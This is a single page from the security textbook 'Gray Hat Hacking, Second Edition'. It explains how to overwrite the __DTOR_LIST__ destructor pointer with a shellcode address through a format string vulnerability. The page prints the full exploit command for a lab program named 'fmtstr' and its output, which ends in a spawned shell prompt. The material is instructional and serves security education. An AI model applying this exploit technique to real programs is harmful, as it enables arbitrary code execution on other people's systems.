Page 347

Shon Harris, Allen Harper, Chris Eagle, and Jonathan Ness

"Gray Hat Hacking, Second Edition"

To get the first pointer location or the end marker, simply add 4 bytes to the __DTOR_LIST__ location. In our case, this is 0x08049518 + 4 = 0x0804951c (which goes in our second memory slot, bolded in the following code).

Follow the same first column of Table 8-2 to calculate the required format string to overwrite the new memory address 0x0804951c with the same address of the shellcode as used earlier: 0xbfffff50 in our case. Here goes!
$ ./fmtstr `printf "\x1e\x95\x04\x08\x1c\x95\x04\x08"`%.49143x%4\$hn%.16209x%5\$hn
000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000

000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000648
Canary at 0x08049440 = 0x00000000
sh-2.
